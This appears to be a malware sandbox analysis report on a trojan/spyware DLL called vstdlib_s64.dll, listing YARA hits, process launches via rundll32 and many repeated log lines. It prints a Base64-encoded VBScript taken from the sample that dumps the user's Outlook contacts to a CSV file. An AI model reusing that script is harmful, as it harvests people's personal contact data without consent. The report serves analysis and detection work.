                        Source: Yara matchFile source: 11.2.rundll32.exe.2b1acfd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000007.00000002.1808931782.000001AB44DF2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.3552909524.000001B080DF2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1702280446.0000017CCA232000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.1811295481.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1812688068.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1702356382.000002371EFB2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.1812477246.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.1813216176.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1812687849.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.1811783648.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1808027443.0000018EB8A12000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.1805176816.00000168E3952000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1813780410.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.1729906045.0000013FFD192000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1817877407.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1703302239.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1814452255.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1760309078.000001D941D42000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1805367986.0000021A9FE12000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1703297864.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1806920256.0000021EF74E2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.1804504731.000001D6442D2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1815878708.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.3557919127.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.1730594231.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.1803990209.0000020FEDBB2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1806280015.000002113B832000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1808109707.000001DBF6FC2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.1812533280.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1761110058.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.1805248245.000001DA7ABE2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1815867810.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.1804903406.000001EDD23B2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1805370892.000002B1ACFD2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6220, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5824, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6956, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5052, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2500, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3748, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6864, type: MEMORYSTR
                        Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\system32\Data.logJump to behavior
                        Source: vstdlib_s64.dll.dllStatic PE information: invalid certificate
                        Source: vstdlib_s64.dll.dll, jnrUhiH.csBase64 encoded string: 'Q29uc3QgRm9yV3JpdGluZyA9IDIKClNldCBmcyA9IFdTY3JpcHQuQ3JlYXRlT2JqZWN0KCJTY3JpcHRpbmcuRmlsZVN5c3RlbU9iamVjdCIpClNldCBvZmlsZSA9IGZzLk9wZW5UZXh0RmlsZSgiQzpcVXNlcnNcUHVibGljXERvY3VtZW50c1xjb250YXRvcy5jc3YiLCBGb3JXcml0aW5nLCBUcnVlKSAnIFRydWUgcGFyYSBjcmlhciBvIGFycXVpdm8gc2UgbsOjbyBleGlzdGlyCgpTZXQgb2wgPSBXU2NyaXB0LkNyZWF0ZU9iamVjdCgiT3V0bG9vay5BcHBsaWNhdGlvbiIpClNldCBteU5hbWVTcGFjZSA9IG9sLkdldE5hbWVTcGFjZSgiTUFQSSIpCgpTZXQgbXlDb250YWN0c0ZvbGRlciA9IG15TmFtZVNwYWNlLkdldERlZmF1bHRGb2xkZXIoMTApICcgMTAgw6kgbyB2YWxvciBwYXJhIGEgcGFzdGEgZGUgQ29udGF0b3MKU2V0IG15SXRlbXMgPSBteUNvbnRhY3RzRm9sZGVyLkl0ZW1zCgonIEVzY3JldmVyIG8gY2FiZcOnYWxobyBkbyBDU1YKb2ZpbGUuV3JpdGVMaW5lICJOb21lIENvbXBsZXRvLEVtYWlsLFRlbGVmb25lIENvbWVyY2lhbCxUZWxlZm9uZSBDZWx1bGFyIgoKRm9yIEVhY2ggaXRlbSBJbiBteUl0ZW1zCiAgICBJZiBpdGVtLkNsYXNzID0gNDAgVGhlbiAnIDQwIMOpIG8gdmFsb3IgcGFyYSBpdGVucyBkZSBjb250YXRvCiAgICAgICAgRGltIGZ1bGxOYW1lLCBlbWFpbCwgYnVzaW5lc3NQaG9uZSwgbW9iaWxlUGhvbmUKICAgICAgICBmdWxsTmFtZSA9IGl0ZW0uRnVsbE5hbWUKICAgICAgICBlbWFpbCA9IGl0ZW0uRW1haWwxQWRkcmVzcwogICAgICAgIGJ1c2luZXNzUGhvbmUgPSBpdGVtLkJ1c2luZXNzVGVsZXBob25lTnVtYmVyCiAgICAgICAgbW9iaWxlUGhvbmUgPSBpdGVtLk1vYmlsZVRlbGVwaG9uZU51bWJlcgoKICAgICAgICAnIFN1YnN0aXR1aXIgdmFsb3JlcyBudWxvcyBwb3Igc3RyaW5ncyB2YXppYXMKICAgICAgICBJZiBJc051bGwoZnVsbE5hbWUpIFRoZW4gZnVsbE5hbWUgPSAiIgogICAgICAgIElmIElzTnVsbChlbWFpbCkgVGhlbiBlbWFpbCA9ICIiCiAgICAgICAgSWYgSXNOdWxsKGJ1c2luZXNzUGhvbmUpIFRoZW4gYnVzaW5lc3NQaG9uZSA9ICIiCiAgICAgICAgSWYgSXNOdWxsKG1vYmlsZVBob25lKSBUaGVuIG1vYmlsZVBob25lID0gIiIKCiAgICAgICAgJyBFc2NyZXZlciBsaW5oYSBubyBDU1YKICAgICAgICBvZmlsZS5Xcml0ZUxpbmUgIiIiIiAmIGZ1bGxOYW1lICYgIiIiLCIiIiAmIGVtYWlsICYgIiIiLCIiIiAmIGJ1c2luZXNzUGhvbmUgJiAiIiIsIiIiICYgbW9iaWxlUGhvbmUgJiAiIiIiCiAgICBFbmQgSWYKTmV4dAoKb2ZpbGUuQ2xvc2UKClNldCBvbCA9IE5vdGhpbmcKU2V0IG9maWxlID0gTm90aGluZwpTZXQgZnMgPSBOb3RoaW5nCg=='
                        Source: classification engineClassification label: mal80.troj.spyw.evad.winDLL@38/2@5/4
                        Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\rundll32.exe.logJump to behavior
                        Source: C:\Windows\System32\rundll32.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2784:120:WilError_03
                        Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\e4d6a6ec-320d-48ee-b6b2-fa24f03760d4
                        Source: vstdlib_s64.dll.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: vstdlib_s64.dll.dllStatic file information: TRID: Win64 Dynamic Link Library (generic) Net Framework (111504/3) 44.42%
                        Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixDoubleSlashes
                        Source: vstdlib_s64.dll.dllReversingLabs: Detection: 26%
                        Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll"
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixDoubleSlashes
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixSlashes
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_IsAbsolutePath
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixDoubleSlashes
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixSlashes
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_IsAbsolutePath
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_vsnwprintf
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncpy
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat_length
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_snprintf
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF8ToUTF16
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF16ToUTF8
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripTrailingSlash
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripLastDir
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_RemoveDotSlashes
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1Jump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixDoubleSlashesJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixSlashesJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_IsAbsolutePathJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixDoubleSlashesJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixSlashesJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_IsAbsolutePathJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_vsnwprintfJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncpyJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat_lengthJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncatJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_snprintfJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF8ToUTF16Jump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF16ToUTF8Jump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripTrailingSlashJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripLastDirJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_RemoveDotSlashesJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1Jump to behavior
                        Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: vstdlib_s64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: vstdlib_s64.dll.dllStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: vstdlib_s64.dll.dllStatic PE information: Image base 0x180000000 > 0x60000000
                        Source: vstdlib_s64.dll.dllStatic file information: File size 7477096 > 1048576
                        Source: vstdlib_s64.dll.dllStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x71de00
                        Source: vstdlib_s64.dll.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
